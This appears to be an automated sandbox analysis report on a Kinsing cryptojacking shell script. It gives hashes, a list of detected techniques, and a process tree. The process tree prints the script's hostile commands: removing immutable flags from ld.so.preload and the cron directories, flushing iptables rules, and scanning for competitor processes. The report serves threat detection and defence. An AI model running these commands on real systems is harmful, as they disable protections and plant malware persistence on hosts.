Analysis
-
max time kernel
63s -
max time network
150s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24/02/2025, 03:47
Static task
static1
Behavioral task
behavioral1
Sample
ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh
-
Size
15KB
-
MD5
1148f3f35f95c8dd4810d228f1b1c0e9
-
SHA1
bb32c94c2351bd40779a62c222d6d3a8ea9d2401
-
SHA256
ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14
-
SHA512
296fb2cf231902bfb1a744518d86513ed60bc08161c2c1da58a2876618e9db40fced8e117afcb5994b03f6a0d05debeeddf9d1e4ff75e1208920b794d06c9cc5
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwH:trgXux7YJDj8OoJwH
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral2/files/fstream-17.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral2/files/fstream-16.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1659 chmod 1668 chmod 1670 chmod 1675 chmod 1677 chmod 1683 chmod 1684 chmod 1657 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1685 ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 671 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1398 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1494 xargs 1507 xargs 1577 xargs 1592 xargs 658 chattr 1572 sed 1635 xargs 1646 xargs 1525 xargs 1607 xargs 1466 xargs 1482 xargs 1560 sed 1571 xargs 1593 sed 1513 xargs 1410 uname 1435 xargs 1450 xargs 1569 sed 1584 sed 1587 sed 1590 sed 665 chattr 1476 xargs 1489 xargs 1519 xargs 1575 sed 1586 xargs 1651 xargs 1445 xargs 1471 xargs 1501 xargs 1562 xargs 1565 xargs 1574 xargs 1581 sed 1583 xargs 667 chattr 1559 xargs 1563 sed 1566 sed 1589 xargs 1595 xargs 1612 xargs 1624 xargs 1568 xargs 1440 xargs 1456 xargs 1461 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.HrsHof crontab File opened for modification /var/spool/cron/crontabs/tmp.GuiLOd crontab File opened for modification /var/spool/cron/crontabs/tmp.PZGjTo crontab File opened for modification /var/spool/cron/crontabs/tmp.XuLbEM crontab File opened for modification /var/spool/cron/crontabs/tmp.YHh0e5 crontab File opened for modification /var/spool/cron/crontabs/tmp.C01meC crontab File opened for modification /var/spool/cron/crontabs/tmp.WCmn3d crontab File opened for modification /var/spool/cron/crontabs/tmp.W6pcaI crontab File opened for modification /var/spool/cron/crontabs/tmp.AUwOrb crontab File opened for modification /var/spool/cron/crontabs/tmp.W2lyGy crontab File opened for modification /var/spool/cron/crontabs/tmp.t7X9DG crontab File opened for modification /var/spool/cron/crontabs/tmp.ZT6LCJ crontab File opened for modification /var/spool/cron/crontabs/tmp.P33Fxd crontab File opened for modification /var/spool/cron/crontabs/tmp.TGsqlS crontab File opened for modification /var/spool/cron/crontabs/tmp.NEFpJ0 crontab File opened for modification /var/spool/cron/crontabs/tmp.VBUFOv crontab File opened for modification /var/spool/cron/crontabs/tmp.adNOZC crontab File opened for modification /var/spool/cron/crontabs/tmp.9YY6YT crontab File opened for modification /var/spool/cron/crontabs/tmp.JYkTPR crontab File opened for modification /var/spool/cron/crontabs/tmp.hPFFZR crontab File opened for modification /var/spool/cron/crontabs/tmp.VUvQo3 crontab File opened for modification /var/spool/cron/crontabs/tmp.A3Pmia crontab File opened for modification /var/spool/cron/crontabs/tmp.CzF5bD crontab File opened for modification /var/spool/cron/crontabs/tmp.ZqCr6p crontab File opened for modification /var/spool/cron/crontabs/tmp.c3uVbd crontab File opened for modification /var/spool/cron/crontabs/tmp.XDZD6p crontab File opened for modification /var/spool/cron/crontabs/tmp.9Pyrfd crontab File opened for modification /var/spool/cron/crontabs/tmp.c2RKah crontab File opened for modification /var/spool/cron/crontabs/tmp.Cqkekn crontab File opened for modification /var/spool/cron/crontabs/tmp.zbrNRl crontab File opened for modification /var/spool/cron/crontabs/tmp.SD4A28 crontab File opened for modification /var/spool/cron/crontabs/tmp.4tuVxM crontab File opened for modification /var/spool/cron/crontabs/tmp.ZinVok crontab File opened for modification /var/spool/cron/crontabs/tmp.Z50QMP crontab File opened for modification /var/spool/cron/crontabs/tmp.ajA68D crontab File opened for modification /var/spool/cron/crontabs/tmp.6hw8w0 crontab File opened for modification /var/spool/cron/crontabs/tmp.W1o03b crontab File opened for modification /var/spool/cron/crontabs/tmp.drs83x crontab File opened for modification /var/spool/cron/crontabs/tmp.EMuht3 crontab File opened for modification /var/spool/cron/crontabs/tmp.NbUdZr crontab File opened for modification /var/spool/cron/crontabs/tmp.03vBdc crontab File opened for modification /var/spool/cron/crontabs/tmp.wVnA2p crontab File opened for modification /var/spool/cron/crontabs/tmp.maXFDI crontab File opened for modification /var/spool/cron/crontabs/tmp.PxVHS5 crontab File opened for modification /var/spool/cron/crontabs/tmp.yrayau crontab File opened for modification /var/spool/cron/crontabs/tmp.raDckP crontab File opened for modification /var/spool/cron/crontabs/tmp.WlabwY crontab File opened for modification /var/spool/cron/crontabs/tmp.WKPaER crontab File opened for modification /var/spool/cron/crontabs/tmp.EcEyF3 crontab File opened for modification /var/spool/cron/crontabs/tmp.MzvLa0 crontab File opened for modification /var/spool/cron/crontabs/tmp.gq8SOh crontab File opened for modification /var/spool/cron/crontabs/tmp.DfspZr crontab File opened for modification /var/spool/cron/crontabs/tmp.l7O10r crontab File opened for modification /var/spool/cron/crontabs/tmp.kI6ofc crontab File opened for modification /var/spool/cron/crontabs/tmp.EQEsG7 crontab File opened for modification /var/spool/cron/crontabs/tmp.kgbDYL crontab File opened for modification /var/spool/cron/crontabs/tmp.g7qICb crontab File opened for modification /var/spool/cron/crontabs/tmp.NNTlvr crontab File opened for modification /var/spool/cron/crontabs/tmp.3ZBEbV crontab File opened for modification /var/spool/cron/crontabs/tmp.Gt35Qi crontab File opened for modification /var/spool/cron/crontabs/tmp.s0pRbb crontab File opened for modification /var/spool/cron/crontabs/tmp.q60BuC crontab File opened for modification /var/spool/cron/crontabs/tmp.fP26xm crontab File opened for modification /var/spool/cron/crontabs/tmp.HPO3pS crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh -
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1603 ps 1608 ps 1457 ps 1467 ps 1472 ps 1478 ps 1485 ps 1647 ps 1452 ps 1462 ps 1490 ps 1555 ps -
description ioc Process File opened for reading /proc/1527/cmdline pkill File opened for reading /proc/29/cmdline pkill File opened for reading /proc/15/status pkill File opened for reading /proc/269/stat ps File opened for reading /proc/uptime ps File opened for reading /proc/41/status ps File opened for reading /proc/137/status pkill File opened for reading /proc/41/status ps File opened for reading /proc/136/status pkill File opened for reading /proc/598/cmdline ps File opened for reading /proc/21/status ps File opened for reading /proc/26/stat ps File opened for reading /proc/7/status ps File opened for reading /proc/20/stat ps File opened for reading /proc/131/status pkill File opened for reading /proc/1/status pkill File opened for reading /proc/298/cmdline pkill File opened for reading /proc/15/cmdline pkill File opened for reading /proc/25/cmdline ps File opened for reading /proc/22/stat ps File opened for reading /proc/41/status pkill File opened for reading /proc/107/cmdline pkill File opened for reading /proc/273/status pkill File opened for reading /proc/6/status pkill File opened for reading /proc/653/stat ps File opened for reading /proc/338/cmdline pkill File opened for reading /proc/273/status pkill File opened for reading /proc/131/stat ps File opened for reading /proc/22/status ps File opened for reading /proc/4/status ps File opened for reading /proc/10/cmdline ps File opened for reading /proc/272/cmdline ps File opened for reading /proc/653/cmdline pkill File opened for reading /proc/26/status pkill File opened for reading /proc/1418/status ps File opened for reading /proc/13/stat ps File opened for reading /proc/15/status ps File opened for reading /proc/42/cmdline pkill File opened for reading /proc/1369/cmdline pkill File opened for reading /proc/652/cmdline pkill File opened for reading /proc/75/status pkill File opened for reading /proc/42/cmdline pkill File opened for reading /proc/106/status pkill File opened for reading /proc/1547/status pkill File opened for reading /proc/7/cmdline pkill File opened for reading /proc/42/status pkill File opened for reading /proc/10/cmdline ps File opened for reading /proc/301/cmdline pkill File opened for reading /proc/162/stat ps File opened for reading /proc/657/status pkill File opened for reading /proc/75/status pkill File opened for reading /proc/8/cmdline pkill File opened for reading /proc/8/cmdline pkill File opened for reading /proc/filesystems ls File opened for reading /proc/20/stat ps File opened for reading /proc/104/stat ps File opened for reading /proc/20/cmdline pkill File opened for reading /proc/9/cmdline ps File opened for reading /proc/107/stat ps File opened for reading /proc/15/cmdline ps File opened for reading /proc/601/stat ps File opened for reading /proc/22/status pkill File opened for reading /proc/19/cmdline ps File opened for reading /proc/1369/cmdline pkill -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1351 ls 1789 sed
Processes
-
/tmp/ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh/tmp/ca33dab18381c947257bcf5269bb818b733c890e5af6d0048aa5da629545ef14.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:654 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:658
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:663
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:665
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:667
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:671
-
-
/bin/grepgrep exe2⤵PID:681
-
-
/bin/lsls -latrh /proc/12⤵PID:680
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:687
-
-
/bin/lsls -latrh /proc/102⤵PID:691
-
-
/bin/grepgrep exe2⤵PID:692
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:695
-
-
/bin/lsls -latrh /proc/1042⤵PID:699
-
-
/bin/grepgrep exe2⤵PID:700
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:702
-
-
/bin/lsls -latrh /proc/1062⤵PID:705
-
-
/bin/grepgrep exe2⤵PID:706
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:710
-
-
/bin/grepgrep exe2⤵PID:714
-
-
/bin/lsls -latrh /proc/1072⤵PID:712
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:716
-
-
/bin/grepgrep exe2⤵PID:719
-
-
/bin/lsls -latrh /proc/112⤵PID:718
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:722
-
-
/bin/lsls -latrh /proc/122⤵PID:724
-
-
/bin/grepgrep exe2⤵PID:725
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:727
-
-
/bin/lsls -latrh /proc/132⤵PID:729
-
-
/bin/grepgrep exe2⤵PID:730
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:732
-
-
/bin/grepgrep exe2⤵PID:735
-
-
/bin/lsls -latrh /proc/1312⤵PID:734
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:737
-
-
/bin/lsls -latrh /proc/1362⤵PID:739
-
-
/bin/grepgrep exe2⤵PID:740
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:742
-
-
/bin/lsls -latrh /proc/1372⤵PID:744
-
-
/bin/grepgrep exe2⤵PID:745
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:747
-
-
/bin/lsls -latrh /proc/142⤵PID:749
-
-
/bin/grepgrep exe2⤵PID:750
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:752
-
-
/bin/lsls -latrh /proc/1462⤵PID:754
-
-
/bin/grepgrep exe2⤵PID:755
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:759
-
-
/bin/lsls -latrh /proc/152⤵PID:761
-
-
/bin/grepgrep exe2⤵PID:762
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:766
-
-
/bin/lsls -latrh /proc/162⤵PID:768
-
-
/bin/grepgrep exe2⤵PID:769
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:772
-
-
/bin/lsls -latrh /proc/1622⤵PID:775
-
-
/bin/grepgrep exe2⤵PID:776
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:779
-
-
/bin/lsls -latrh /proc/172⤵PID:782
-
-
/bin/grepgrep exe2⤵PID:783
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:785
-
-
/bin/lsls -latrh /proc/182⤵PID:788
-
-
/bin/grepgrep exe2⤵PID:789
-
-
